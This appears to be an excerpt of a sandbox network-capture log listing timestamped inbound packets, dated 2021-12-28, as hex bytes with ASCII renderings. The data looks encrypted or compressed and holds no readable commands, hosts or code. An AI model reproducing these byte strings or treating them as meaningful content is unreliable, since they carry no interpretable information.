                                                                                                                                                        2021-12-28 02:24:06 UTC4051INData Raw: b3 2f 76 69 a1 95 ff a4 8c b7 ed ea ae 4a 4e da 57 bd db b9 f6 f3 fa 8d c4 60 6e f0 de 62 f2 4e 79 a2 6f 7b 9c 00 0e 1b 67 e3 70 3e 42 c8 ff f4 fd 2c 75 f6 2e 1d 41 5d ef 50 1f 88 e7 2c 1d b8 f2 a8 65 c5 1f 9b 2f 31 c8 87 2a b1 f0 7c be 68 48 e6 70 12 33 f4 a2 5a 7b 7b 47 b0 e5 f4 f9 4e 79 66 52 ff e6 a7 cd 44 71 2e c7 c1 10 18 bb 7c 26 72 68 dd b2 a0 3a 9a 66 78 4b 42 a0 33 e7 87 1f 7e a1 f4 cc 99 c4 ca 05 80 f6 f9 81 f1 e9 67 2f a1 ba 2a 43 79 4e 54 45 56 1b aa 2e a4 cb bf c0 fb 82 5b 27 23 cf 98 3b 35 92 29 3a c2 63 36 4e 13 e6 41 ad 2f 29 f3 cd f4 68 6f c4 43 84 92 2b 99 c0 08 5d 7e f7 bd 74 b0 75 cb 85 e3 8b 0b 25 8f 27 9f 7d 90 f0 fb 92 13 41 2d da 1f 74 8a 8c 59 f3 46 04 ca b7 1a 75 92 1d 94 12 31 51 72 66 e1 b9 1d 76 e0 5d 29 ef 6d 35 bb 4b be 8c
                                                                                                                                                        Data Ascii: /viJNW`nbNyo{gp>B,u.A]P,e/1*|hHp3Z{{GNyfRDq.|&rh:fxKB3~g/*CyNTEV.['#;5):c6NA/)hoC+]~tu%'}A-tYFu1Qrfv])m5K
                                                                                                                                                        2021-12-28 02:24:06 UTC4067INData Raw: dd 34 4f e3 11 50 33 a3 24 a2 17 d2 4f 88 3f f5 e9 e0 10 a0 7b ec 12 17 31 cf 82 41 80 16 6f 14 0c fd 4e e2 5f af 78 85 3b 29 b1 e8 2b b5 75 88 71 26 a1 ee 90 cc f0 78 ec 85 03 d3 89 62 38 9f 4c c7 f4 96 bf 43 4d bc 36 71 93 77 cc b0 2c f1 4a be fb c2 d0 ce a2 43 ee 80 5c 9f 0f 05 22 cd 14 27 8b 12 4c c0 2b 75 64 47 85 c7 c0 7e 42 fe 12 fc 4a 61 b8 95 ed 4b 1f 81 d8 31 4e b8 ea ea 7c 2e be d6 30 58 8a 16 79 c7 01 8a 1a 78 52 fe 67 fc 8f dc 12 4a cf f3 8e 5f 5e dc 25 a6 0a dc 0c bb 6d 6a e5 b6 dd 7c f3 1b ea 0d d4 ec 4d a5 08 c3 69 6e 56 ef 0e d7 e6 8f 37 38 47 a7 10 f2 ed 4b 4b 5b 90 3e e4 01 2a 2f 9c 76 91 03 9a a5 f2 68 ce 82 db 52 6c 62 ff 9a 3a 0e 32 cc a4 ad fc f0 94 d2 68 74 12 2f dc 82 61 94 f6 cd b7 66 35 5c 4d 3a 6f ce ed fb ab 13 57 db 52 ca b8
                                                                                                                                                        Data Ascii: 4OP3$O?{1AoN_x;)+uq&xb8LCM6qw,JC\"'L+udG~BJaK1N|.0XyxRgJ_^%mj|MinV78GKK[>*/vhRlb:2ht/af5\M:oWR
                                                                                                                                                        2021-12-28 02:24:06 UTC4083INData Raw: 6d 27 da 19 15 1f fe a3 88 9b 4a d3 f4 31 39 1d 6b 23 12 32 f6 8b 17 b7 44 0d 27 02 dc 46 70 9b 65 85 d2 9e c7 1c 39 4f 60 ee f5 04 af 7a 60 a0 67 c2 c5 6e 26 98 3a 93 1a 95 dc 52 e0 a7 04 88 fe 0a fc 38 bc ae 52 44 33 3a 7e 97 30 67 e7 85 b7 81 67 ad 2b 22 b0 71 89 e8 a0 f5 23 9a 53 7b f5 7e d8 3e 5e 23 42 97 70 d5 44 d5 49 75 d5 b3 cc 17 9d 4e e1 db 2b be 72 7d ba a0 6b f2 89 8f 1d 79 30 3d 1d 17 14 d8 8f 6a ce 05 22 a6 c2 ed 74 d2 b3 bc 8d 2b 09 1f dc 93 a8 d7 e8 c3 01 9d c1 a4 28 3d 55 74 a3 cc bf 8f f6 83 f7 4d f1 28 5c 96 05 f2 2a 54 a4 32 cd 7f 0b 86 64 1a de b4 b7 67 55 be 03 ee f5 0a 93 c4 56 87 3d 3d 9e b2 6b 79 01 68 41 67 74 2d 82 94 b3 7c 27 21 83 ea 36 95 bd 6d 75 cd e0 e0 64 bd 88 3a 84 24 a8 01 3b d4 bd 27 7e 31 c9 af ee d2 3d ae fe 32 c5
                                                                                                                                                        Data Ascii: m'J19k#2D'Fpe9O`z`gn&:R8RD3:~0gg+"q#S{~>^#BpDIuN+r}ky0=j"t+(=UtM(\*T2dgUV==kyhAgt-|'!6mud:$;'~1=2
                                                                                                                                                        2021-12-28 02:24:06 UTC4099INData Raw: a9 a0 31 9a 03 ad f4 41 42 d0 76 15 09 be 32 e3 1f 2c 5f 06 f3 c0 ba ec e1 6b 20 99 e0 20 83 9f df 7f 0c 84 6b ca 20 40 cf 11 39 7a 1e c1 02 74 88 46 f9 eb 1b 73 25 6c ea 9c f4 8f b2 9d a1 c8 d6 87 90 1b 1f 86 aa b5 38 86 d7 00 e6 fc d1 74 50 99 b8 c0 d7 68 c4 86 11 27 e7 99 85 08 f5 0e d0 c2 3d 60 6e e6 b8 82 9a 3a 29 75 a1 ad bb b4 8b 15 c7 cf a5 83 27 06 43 28 43 96 7b 06 6e 33 d8 04 0f 0a b3 4a 49 3c 68 f3 3a b7 89 02 4a 77 a3 82 4a 88 b7 6d 69 4d bc db 18 83 06 1c 90 66 3e 48 66 9e 8f d9 1a 66 63 21 e8 8c f0 65 06 d9 61 9b c5 09 e7 3e 53 d2 55 22 ef b4 95 06 ae 95 3a cb 12 03 2c 0c 3a 4c 07 d7 50 01 3b 57 c2 63 46 0c 10 7b 52 e0 3e d2 09 d0 2c 82 7f 02 a6 8d 13 e6 7e 09 9b b8 b7 9f cf 0f 9a f2 63 97 7f ce 32 d6 67 57 7a 22 2f cd e4 31 79 65 8c 2d ba
                                                                                                                                                        Data Ascii: 1ABv2,_k k @9ztFs%l8tPh'=`n:)u'C(C{n3JI<h:JwJmiMf>Hffc!ea>SU":,:LP;WcF{R>,~c2gWz"/1ye-
                                                                                                                                                        2021-12-28 02:24:06 UTC4115INData Raw: 01 e3 c8 55 d2 8c df ee 8a 89 b4 28 d9 6e f9 da a4 19 63 de d3 e3 6b fe 51 12 c4 f4 07 df 05 d6 0b 5c 1b 34 ce fb 45 23 02 8f 0d 55 92 eb ee c1 b3 e5 60 1b c8 89 8f 87 ec 51 0e aa 07 a0 c6 42 66 80 28 b4 09 ba c7 7c 23 a0 28 1f 57 86 9e f5 78 a8 51 33 4f 29 03 3e dc f8 f9 5a 78 86 dc dd d9 bd bd 4e 4d e7 26 84 68 bc ae a6 ab 89 90 45 35 cc df a9 c6 9c 78 01 14 44 fd fe 67 59 63 b6 c7 d8 4c 3e fa 35 7c 3a 62 6b 73 0d 14 e1 d7 96 b8 68 32 99 3a b6 7f 6d 10 64 bb 58 d7 96 4f 06 62 98 0b e5 56 ce 08 ad 19 8f 30 e3 6b 56 ef 0e 92 af b7 a3 c0 5a 7a 72 33 39 2a 13 38 ce 1b bd 6a 26 9c e0 b5 6b 58 6c bd d6 0b 05 f3 b4 c2 74 5a ce 60 fd 1a bb 68 8b 82 85 23 9e df 56 b4 28 c2 92 31 d5 aa a2 2b 00 37 0b 46 35 a6 c4 3e cc f7 94 fd 8d 62 66 50 58 32 74 64 51 96 d8 e2
                                                                                                                                                        Data Ascii: U(nckQ\4E#U`QBf(|#(WxQ3O)>ZxNM&hE5xDgYcL>5|:bksh2:mdXObV0kVZzr39*8j&kXltZ`h#V(1+7F5>bfPX2tdQ
                                                                                                                                                        2021-12-28 02:24:06 UTC4131INData Raw: 1e a2 ee 7f b1 13 bf a8 ef 6e 2c cc 18 a3 d1 5f a2 84 05 e1 6b 5d 61 aa ad e2 44 41 e7 2a 2e 72 6c 51 19 15 42 59 3e 20 6d df fa 42 d3 0e 99 3e 06 8e 99 ae be 41 b8 12 a1 e9 61 e8 6f 78 7f 5d d6 1d 28 d1 76 17 35 74 77 26 27 b7 1b 49 80 47 75 3a 3f 36 b4 02 77 09 c8 ad 82 da b2 81 0b 64 84 97 57 4b 98 40 ea 85 0b af 43 40 d3 60 d9 fd e2 f0 b4 20 65 56 9e 28 58 2c ec ee 52 89 52 97 43 6f 40 7e 44 51 62 5d 60 0f 57 79 a0 5d df 57 db 8d e5 06 b3 c7 3f 32 b3 9b 5c 9a e7 5f f1 b1 31 c6 83 1b 54 90 c2 60 68 8a f7 45 ce 34 70 26 9d e5 4a d8 85 dc f0 b1 56 1d 40 bb 83 70 07 d0 73 52 a8 fe 1c eb d5 16 8d 10 a8 04 91 d8 13 dd a5 95 19 0b ca 47 52 72 47 db 9f c9 a9 22 83 22 71 c5 bf cc 03 70 29 95 28 a8 65 57 2a 77 cd 5c 87 98 95 31 9a 40 69 b4 b1 1d 48 97 cd bd 31
                                                                                                                                                        Data Ascii: n,_k]aDA*.rlQBY> mB>Aaox](v5tw&'IGu:?6wdWK@C@` eV(X,RRCo@~DQb]`Wy]W?2\_1T`hE4p&JV@psRGRrG""qp)(eW*w\1@iH1
                                                                                                                                                        2021-12-28 02:24:06 UTC4147INData Raw: d6 5a e6 f9 45 e1 66 cf 4e 8f 9b e3 69 44 55 37 a3 02 cd fa 1b 52 5d 6b 34 c9 90 25 ce 07 d0 29 68 f1 25 2f f4 3b 57 48 6f 0e 80 82 2d 93 0d 8d 02 53 05 eb 7e 64 59 79 cc 1b 52 cb d6 14 52 dc 52 34 ff 26 08 04 44 e2 a0 38 24 03 4d b9 53 9b 8f e0 2b 4a 0b 01 e9 35 74 f4 e3 75 f0 ad 2f 15 05 4b bf 2a 58 0b 88 18 6a 2c 71 b2 4a b7 6c d5 ae 51 55 f0 bb df b5 c7 b8 00 b6 c9 dd f9 46 b8 b8 d5 58 36 72 56 51 b2 78 23 a4 c7 bf 7a c0 cb c7 60 34 a0 7d c0 21 01 64 07 0a 28 bb fd f8 3c a6 71 51 e0 c9 6d b1 29 43 8e 00 9b cb 58 c5 cd e5 34 55 1a 73 96 b6 9c bb 74 fc 1b e8 2f 0c 65 c1 17 33 46 fa 0d 1e 7d 3c 84 5e 59 89 39 ea ba 2f 50 0f f0 52 42 74 92 bc 93 e2 a0 bb 60 12 0a 28 4b 1b 95 3f ec e7 d7 08 d3 f2 01 c7 99 44 25 3f 39 3f 75 1b fe 73 23 32 e9 ac 3b cf aa ff
                                                                                                                                                        Data Ascii: ZEfNiDU7R]k4%)h%/;WHo-S~dYyRRR4&D8$MS+J5tu/K*Xj,qJlQUFX6rVQx#z`4}!d(<qQm)CX4Ust/e3F}<^Y9/PRBt`(K?D%?9?us#2;
                                                                                                                                                        2021-12-28 02:24:06 UTC4163INData Raw: d3 55 35 03 10 c1 9b 78 ac 83 f6 57 23 db 02 e8 8c 38 a5 d6 1c b7 7e 43 a8 db 07 05 2f 98 70 b7 31 45 a1 9d b4 2c 3f 6d 66 d8 43 e0 0e f5 2b a7 ac 64 75 db 23 7f db 36 8e 75 dc 83 2b 85 7c da 6f 88 5c 4a ef 51 cc 9b 09 d5 2f ca fd 40 31 90 72 43 61 0d 47 4e fa 52 46 30 8a 7d d2 39 8c a7 1e eb a9 82 f2 20 07 45 03 4d e7 cc ac 48 68 1f 5a 8d 73 bc da ee e3 47 9d 24 bc ef 67 4b 4f c0 0a 7c 93 4e ab 32 3b 0f be 82 f4 f3 67 ab d5 b6 a4 7c 68 76 7e 43 23 3f 2e cd b8 ff 6c 17 ca e8 a1 2d fc c8 fc d8 e4 bb 08 21 05 33 3b de 3c 85 a1 e7 6b bc 65 ab 34 35 0f b5 84 cc 68 5c 51 b9 44 e3 48 31 54 d4 a6 e0 67 7b 41 92 15 e1 ac ce 94 39 6f 94 92 ea f3 17 e2 ea 2f 26 dd 56 78 3c 56 04 27 54 4a 03 fd e9 f5 88 23 a3 d5 1a 6a e1 df 9c 20 54 ef fc 77 1f 09 d4 ac 2c 71 6b 01
                                                                                                                                                        Data Ascii: U5xW#8~C/p1E,?mfC+du#6u+|o\JQ/@1rCaGNRF0}9 EMHhZsG$gKO|N2;g|hv~C#?.l-!3;<ke45h\QDH1Tg{A9o/&Vx<V'TJ#j Tw,qk
                                                                                                                                                        2021-12-28 02:24:06 UTC4179INData Raw: c6 4a 56 7c 4b b0 86 c4 58 23 55 08 cb c1 08 69 04 19 b2 e8 29 fb 39 1c b6 cb f4 13 e4 77 e2 ea be d1 6f fc da 38 aa 69 78 d0 63 da dc ed 86 59 d3 b6 90 fe 28 9f 23 db 4d 5d 38 06 87 64 f6 58 13 8c 86 a3 90 44 fa 52 81 3f b6 4e e3 19 07 69 8f 27 fd 88 84 65 73 2b db 9d 1a 4f d9 a3 08 26 e1 4c 13 c9 4e e4 e4 8e cf 75 7c 3b 32 21 40 e6 11 36 d2 ba b4 00 85 1d 11 13 45 23 fa 76 c5 fe ce a1 aa 18 2e 2a 13 b6 d2 31 d6 0b 4c a0 65 75 c0 c7 2b 75 a7 ab 1c 70 9f ad 39 8b ae 18 5d 28 bd 46 0e 0f e1 55 ae 85 86 7e 2b b9 88 7e 1e 41 3a 8f 54 b0 e7 cc 36 b9 77 44 58 12 3a 48 97 99 08 de 8e 58 34 3e 47 6c 40 c0 dd 93 f9 f9 df 14 58 69 04 9d 85 4d 85 51 1d 69 55 a3 f6 35 e0 a5 45 af 2e 4e 92 da 36 f4 7f dc ed 62 1a c7 55 ff 2a bd 11 c6 ae 88 48 c3 ad f0 35 96 ec 17 4b
                                                                                                                                                        Data Ascii: JV|KX#Ui)9wo8ixcY(#M]8dXDR?Ni'es+O&LNu|;2!@6E#v.*1Leu+up9](FU~+~A:T6wDX:HX4>Gl@XiMQiU5E.N6bU*H5K
                                                                                                                                                        2021-12-28 02:24:06 UTC4195INData Raw: 25 aa 45 cf 5a df 4c 18 97 88 25 0e e1 72 52 7e b6 05 99 df 36 eb 41 88 79 de b5 a9 7a bc d4 2c 28 34 43 e0 1b 43 80 cd be 05 93 00 04 84 98 13 b1 8b bb f1 f7 a5 48 a8 9b eb 4f 18 94 32 0e e9 43 d0 ef 88 a8 9f f6 a5 ff 71 a0 2e 58 ea 0e 9d 7b f1 a9 88 f8 b2 25 5c 14 21 51 9b 3f 86 63 96 b2 2c 61 95 87 78 ed 50 64 1a 3a 91 5c f8 9c 67 9f db 42 64 98 5f 74 75 73 12 74 10 df d4 5c 83 e3 9c 56 ff 45 2a 4f 60 59 5d ce 96 bd a7 e1 97 59 69 66 9c 93 e3 67 dc 3a a0 97 ba a8 2a eb e6 31 06 58 08 86 d2 91 54 28 73 77 e7 aa 2b 3b 40 e0 62 d5 52 fc 69 10 99 96 34 2e 80 1c 50 84 3b a1 8d 50 55 6d de b8 de 81 4a be fe 4c 63 35 fd 3c f8 70 8d d9 6e c8 9e 63 7f 87 29 14 92 f8 04 83 d0 8c 44 b9 6c 7f 4f c1 f3 95 36 df 5d b4 40 11 ee fb 65 c9 ef 87 b4 7a 78 40 bd 67 97 e2
                                                                                                                                                        Data Ascii: %EZL%rR~6Ayz,(4CCHO2Cq.X{%\!Q?c,axPd:\gBd_tust\VE*O`Y]Yifg:*1XT(sw+;@bRi4.P;PUmJLc5<pnc)DlO6]@ezx@g
                                                                                                                                                        2021-12-28 02:24:06 UTC4211INData Raw: 7f e4 97 84 20 21 b9 1e d4 e9 41 64 de 3a 8d 34 ca 11 f0 a4 f6 62 b3 07 dd 8d 71 02 b3 ae 60 8c e3 22 ba 5b f7 47 dd 77 35 28 7c ff e1 f1 d3 ff 18 af 71 52 d3 7f 26 e5 dc 6a 27 a9 32 33 63 6e e0 93 1b b2 02 6b 65 d8 fa cd 9d 5f b7 ab ff 6e 25 24 9c 90 f3 a1 94 9d 4d 95 ba 00 0b 53 44 63 75 cb a6 31 4d a2 2d 49 3a d0 ec 4e 2f cc 2c c5 3f d7 42 8b 6b c4 3e 45 b4 43 48 8e 57 55 15 cd 51 a4 13 ce b8 cc 12 79 59 3f 5f 23 de b6 9d 95 3c 51 b7 1b cd ee 24 2c 60 14 9e 92 9e 56 db 50 30 a1 62 f6 7d 09 c2 12 dd a3 f5 dd fc 35 a3 a7 cb 1a 97 31 ea e4 20 12 37 a3 1a 36 0e 2e 7b 6c 6b f3 33 05 a6 12 e8 2b 10 6d 05 bb 59 fc cf 64 69 27 1d dc 4c ac 10 a5 6c 3c a5 78 84 f6 c2 38 84 53 87 43 c3 7a da 37 6b 6c aa 0d 9e 38 08 35 35 7c 7c 09 72 58 66 f6 6c 63 80 af 7f a6 d7
                                                                                                                                                        Data Ascii: !Ad:4bq`"[Gw5(|qR&j'23cnke_n%$MSDcu1M-I:N/,?Bk>ECHWUQyY?_#<Q$,`VP0b}51 76.{lk3+mYdi'Ll<x8SCz7kl855||rXflc
                                                                                                                                                        2021-12-28 02:24:06 UTC4227INData Raw: 3e ae 7c 00 bb 7c b4 59 1a 04 99 11 87 61 25 ff d8 0c 9d 88 5d 92 17 b3 cd bd a2 9f bb 67 a2 31 6c 11 52 0e 78 7b c5 be 4c 3a 27 c1 d5 2c c0 dd 0e 93 41 74 11 da c1 ea f0 a7 c0 dc ee 4c b8 64 65 90 32 2a 76 a3 60 30 dc 87 75 4e bc c9 bb 58 7b 29 c6 fd f8 85 3a 6c 9a 5f 4d 4f 8e 2a 0e f7 20 a8 38 f3 15 ba c8 d8 b4 91 48 86 01 33 c0 c9 a0 83 2b d0 b0 36 fe ff 02 1e 0d c5 2e c3 bc 69 19 6f 71 a6 72 28 f2 96 e8 60 f1 df bd 42 e6 11 7a 9a 62 65 b3 6c a1 61 0c 01 b8 01 c9 c4 37 e8 0e da b5 ac d6 5c 86 87 8d 22 64 93 30 42 96 13 98 bf 43 60 f8 1e b2 d9 25 29 be 80 da d7 17 72 01 cf a1 74 e5 0f 58 11 ad f9 e7 dd 5c ce 26 bf 57 c1 b7 67 85 94 03 49 39 08 7f f6 d1 79 75 fe 58 5f 1c f5 c2 c4 18 7f 2a 70 75 82 6a 00 78 58 f8 8a 12 33 23 47 b1 b2 e3 72 8a 9a 0a a6 c0
                                                                                                                                                        Data Ascii: >||Ya%]g1lRx{L:',AtLde2*v`0uNX{):l_MO* 8H3+6.ioqr(`Bzbela7\"d0BC`%)rtX\&WgI9yuX_*pujxX3#Gr
                                                                                                                                                        2021-12-28 02:24:06 UTC4235INData Raw: 46 20 68 d3 78 5b 12 e7 1a d4 89 7e 61 9f 82 8b ec 2e 09 e3 fe a8 53 62 27 e5 2e 45 81 e5 e3 63 7d 3a 8e 5d 65 c6 ec dc bc 78 c1 b9 44 6a a9 61 b9 32 3e 4c 4a c6 6c b2 5c e0 5c bc 8b 41 6f 7a df 39 f2 b4 a8 9f e6 64 3d a5 14 9a b4 6b 46 72 63 fc 3a 5d 99 b2 71 3f 11 75 9d 6b e2 80 e3 f0 78 21 b6 22 6f cb cf 87 83 3b 73 a5 67 fc a5 65 1c fd 0a 2e 82 d5 1b 2a e1 9c b8 6c 4b 81 35 5c 14 97 09 66 c0 de d1 e5 14 b1 bb 2f 01 6b 8b 74 ef 33 1b 74 e7 2e 63 cd 41 c9 3f cd cf 20 ec 2c 19 ca e9 3f e8 a2 b1 12 c5 ba be 93 93 35 dc 09 2f da 50 91 d4 c9 54 3a 60 90 6f fc 16 a9 02 9e a7 e8 ca 1b 15 04 dd 16 5f 9e 19 39 fc 6c b5 c6 52 c0 e1 64 81 57 9a 0f 0b b5 cd f8 ff bc 86 a9 f4 98 77 94 9e 0c b6 1e 9a 29 14 4b 33 44 d6 31 3a 65 6c 5b 54 01 d7 2a 09 ae 84 a6 f7 f9 2b
                                                                                                                                                        Data Ascii: F hx[~a.Sb'.Ec}:]exDja2>LJl\\Aoz9d=kFrc:]q?ukx!"o;sge.*lK5\f/kt3t.cA? ,?5/PT:`o_9lRdWw)K3D1:el[T*+
                                                                                                                                                        2021-12-28 02:24:06 UTC4251INData Raw: 5e 89 d7 03 43 db 4c 43 ed a8 fc 9b 20 69 b5 0f 97 dc 53 5e ce 63 07 78 9f 93 9d 59 c7 07 75 87 72 55 56 11 74 ea db 8c 5c 23 11 99 f9 af 74 2d 43 ee ce 89 b8 f8 d7 66 51 89 d6 0a 2d fd b0 50 8e ca f0 87 cb fc c2 b2 4a d9 b1 25 e9 a1 96 e0 d2 7f 87 a4 e3 69 7d 29 ba 17 dd 6e 22 df 3e 02 a2 3e b8 8a 3e ec c5 0a f9 24 7b 29 33 fc 8a b5 6d 15 71 bd 56 e0 eb 09 c3 6d 7d 07 af f3 5d 8c 74 5b ea cc b2 e5 2c 73 75 c7 77 17 e1 9e 90 a2 03 d8 03 95 79 25 14 dd c1 04 4f 52 69 9d 01 8d 5c 8e a6 fb e9 97 b6 4f 0d ec 9f 4c 5d e0 1f 9b 19 6a d3 8e 11 43 07 9b 55 8d d3 25 fb 65 4a 94 0a 7f 5d bc 41 d4 ae 46 90 f6 4b 2f f6 11 03 8e a3 c4 6a 47 2b a0 a6 f1 46 36 d5 6e e7 8b 6d 71 19 ff bd ee c8 25 f7 7b be 28 84 3a c6 a6 36 9f fb 7f 35 ba 4a 16 a4 46 76 29 a3 92 6e 27 c0
                                                                                                                                                        Data Ascii: ^CLC iS^cxYurUVt\#t-CfQ-PJ%i})n">>>${)3mqVm}]t[,suwy%ORi\OL]jCU%eJ]AFK/jG+F6nmq%{(:65JFv)n'
                                                                                                                                                        2021-12-28 02:24:06 UTC4267INData Raw: 9a a9 52 54 81 5f 78 d3 aa 39 ee 6c 5e 15 14 aa ea cb cf a1 b5 68 68 63 dd 3b 9e b0 52 ee 1d 13 54 2d 31 04 8a fa 66 c1 89 b3 bb 57 00 5d af 61 f6 15 fe a9 67 8a 2c a9 40 bc 7e 64 22 1b 5d b3 63 91 73 79 d2 7a c3 6c 76 4a 3a 93 8f 10 d0 44 bb 10 6f 23 4d 69 5a 98 8e eb 46 0d 3a 1c 72 f4 51 ef 97 95 3a a3 04 50 05 8e eb ae 02 aa 16 b4 f4 91 ac 70 26 58 f6 d6 85 69 3c b5 9d f1 d5 00 48 d6 90 72 d8 38 ab 4f 45 25 1c 23 9a a2 96 80 48 b9 2f c9 ef d8 c1 63 11 dd 53 7a 60 6b 19 b4 23 f4 6f 66 f7 2d 04 7a 70 da 6f 16 3e f4 31 f7 b2 13 f9 cb e7 fd 3b 4c 3d ad 65 9d 57 56 e2 77 3a 34 8b ee 66 e8 b9 08 4a 35 13 d4 fc b5 86 af 00 3c c0 87 cf af 5d 0f 3c 04 62 d0 63 98 3a e7 a3 41 82 22 d7 83 e9 47 44 cd b2 c7 62 46 fb f9 27 c8 a4 5e 42 11 9b 60 d6 fe 57 2e 93 af d7
                                                                                                                                                        Data Ascii: RT_x9l^hhc;RT-1fW]ag,@~d"]csyzlvJ:Do#MiZF:rQ:Pp&Xi<Hr8OE%#H/cSz`k#of-zpo>1;L=eWVw:4fJ5<]<bc:A"GDbF'^B`W.
                                                                                                                                                        2021-12-28 02:24:06 UTC4283INData Raw: ee e5 88 ff c8 38 5f 9b 77 0b 4c 10 46 2f c5 75 2a af c6 78 38 b9 ef 5e 0c f4 ac fa bf 5b 1f cf 0c 8f c0 98 a5 09 87 35 58 8f b8 03 8b 7c 8a 9a b2 3a 3e 23 b0 bd 8e 81 ad 87 3a 47 4f da cf 22 e0 34 38 69 3b 1e d1 ce df 53 19 dd d3 dd b0 1a 90 7f 79 8e a6 97 46 13 e3 e1 4c d7 d6 77 84 6a 97 ae f1 02 ff df e1 8b fe d9 30 28 6d 34 df 53 8d f9 d5 f4 a2 d6 8e 29 71 8d d8 75 9b f2 bd 97 d4 4c c6 40 dc bb b3 69 0b cb b9 ae e5 5e dd 33 51 05 9a 10 ad e8 57 eb 9c b8 38 ea 6a 3e 5b fa 16 54 7d 9c a2 d9 3e 01 89 8a 89 17 33 0d fe f8 b5 4d fa 48 6c ed b5 1b 53 87 8d 55 b8 37 10 82 db dc 33 14 ca cb 2e 64 a7 0c 0a 78 86 04 6d 70 15 2d 6b 2e db a4 96 7a 0f 0c ae c0 ab 38 bc f0 dd 93 21 07 ae 96 98 3b 21 33 a5 dd 82 40 61 76 0d 03 b9 1a c3 95 a1 cf ad 45 61 c1 86 52 ba
                                                                                                                                                        Data Ascii: 8_wLF/u*x8^[5X|:>#:GO"48i;SyFLwj0(m4S)quL@i^3QW8j>[T}>3MHlSU73.dxmp-k.z8!;!3@avEaR
                                                                                                                                                        2021-12-28 02:24:06 UTC4299INData Raw: 2c 9d 39 12 90 4a 2a 91 3f 43 d7 bd 8b d4 d4 f2 5c 7e 02 70 fa 9a a1 7d 5c b8 94 07 41 f4 36 27 83 cb 7e c6 58 7e fd c0 e2 e6 7a 00 ea 56 70 45 ec 7b 33 1d ea 49 fd 37 01 cd 9b 53 09 33 ca f3 39 31 86 d5 f0 7d b2 b6 35 a3 7d 0d fe ff 9c 68 35 ef 70 3d e6 58 eb e6 c1 4f 92 70 b3 d3 7e 25 6b ff e1 a7 37 bf b1 f3 e7 77 43 6a 4a 2e 59 bc 07 1e 87 97 ae b7 03 09 15 c4 14 fe 04 64 65 2b 16 e6 3f 21 87 1a fd 66 e7 91 4f 0c ea b0 9f d7 fe 2b 24 a2 ad 2e 28 8c f6 c7 bd 1a 71 94 89 71 a6 8a c7 52 18 f0 8a 4d f6 90 95 e4 e4 4e f2 74 90 f8 7f 98 af fc a9 42 65 f9 55 3b a3 c5 c3 42 16 70 5a 5c 4c 27 7f 23 fd 06 b4 2f 24 85 61 39 3e 15 ba 07 ad 6e 4e 79 20 c0 49 f1 46 7a b5 ba b4 ab 6f 0f 32 53 ec 35 cd c0 8f c8 b7 56 0a 13 d9 61 26 43 52 22 58 3c 92 95 97 72 f2 5a 1d
                                                                                                                                                        Data Ascii: ,9J*?C\~p}\A6'~X~zVpE{3I7S391}5}h5p=XOp~%k7wCjJ.Yde+?!fO+$.(qqRMNtBeU;BpZ\L'#/$a9>nNy IFzo2S5Va&CR"X<rZ
                                                                                                                                                        2021-12-28 02:24:06 UTC4315INData Raw: c2 53 b2 fb 1d 0d 4e 12 75 17 b2 ce c3 7d 3e ce 26 77 e2 75 5d c2 1d b6 42 29 ec 6c c8 0f f0 15 cc f6 f2 8a cf 7f fd 5b 01 ab 43 2d bc 31 0f 26 1b dd 42 a7 1c 01 49 cb 76 cc a3 ba 54 26 21 a9 27 d7 7e fe b8 5d 0a e7 39 67 8a 77 b6 a0 d6 1f f7 3d 17 08 e2 bb 20 ee cd 16 b7 7f e3 4e 86 c3 87 86 c1 bc 16 09 f0 5b 09 60 6c 7d fa f5 aa 44 97 7a cd ce 13 71 9c 85 30 51 e8 90 23 9a eb 8c f7 03 51 b2 06 07 0a d0 1d 4a 0e c4 88 2d ed b3 6c b2 1a 50 3d a7 fa 11 87 5d 48 17 c4 2e 84 4d 9e 54 1c 33 5b 9f 8d 5a 8b 67 ba 9b a4 20 9c 05 88 54 68 84 b6 f6 1d e8 a4 fa dd 93 3f 9e e6 8a 54 77 72 ac 80 e1 4e d1 94 a2 dd e4 95 a6 e4 c0 fa 9b 96 12 ba dc 52 06 a5 8d f4 98 26 90 c5 60 de 7d e5 1e 5e 91 50 45 29 17 13 bb 9e 95 23 7a 9f 1f aa 12 02 c9 08 06 8b 6a b8 46 77 70 05
                                                                                                                                                        Data Ascii: SNu}>&wu]B)l[C-1&BIvT&!'~]9gw= N[`l}Dzq0Q#QJ-lP=]H.MT3[Zg Th?TwrNR&`}^PE)#zjFwp
                                                                                                                                                        2021-12-28 02:24:06 UTC4331INData Raw: ff 88 52 6e ac 02 8f 6c 41 6c 28 e4 2d 16 a4 4b 73 02 9b 3c f0 c2 c8 55 04 8e 36 62 1e d0 be e1 d5 4c 8e d2 1c d1 97 60 6b 92 3a 63 fa ce 42 6d 69 be 70 74 29 ae ef 35 74 4e cf a3 2e 85 e3 68 6e ca 3d 6c 5d 27 6b c6 6e eb 87 31 99 d7 60 2d b2 80 6d 9c 0f 54 b2 a8 ea cb 1f 18 06 e7 45 e5 4d 63 8d 91 19 d6 ab 7a 6d ff 8e 27 f4 ae 9d 0f a2 89 6b 8f 47 6b d4 18 3c 65 38 1a c0 a3 14 0c 51 df 2a f1 bb 35 a6 36 ac 7c e8 c7 5a 74 1e 92 0e 2c 38 0a 9d cf fe 55 b8 52 68 25 6c 04 90 4f c1 07 16 3f 1c c5 fa f2 5e 5b 14 14 a4 5e bf 4b 00 ff 43 d8 e9 91 f6 9c 15 94 05 c4 06 df fb a8 c9 f2 4b 8d 38 6f ce fd 67 28 79 85 6a 20 be 6a 7c b5 82 ac df 97 c2 5a c1 4d d4 81 ed a9 f4 d3 40 14 0f 2e 1b 11 af 22 76 bb bd 90 1e f7 f4 03 22 c6 d6 57 79 9c a6 2a 19 20 55 1d bf 8f 90
                                                                                                                                                        Data Ascii: RnlAl(-Ks<U6bL`k:cBmipt)5tN.hn=l]'kn1`-mTEMczm'kGk<e8Q*56|Zt,8URh%lO?^[^KCK8og(yj j|ZM@."v"Wy* U
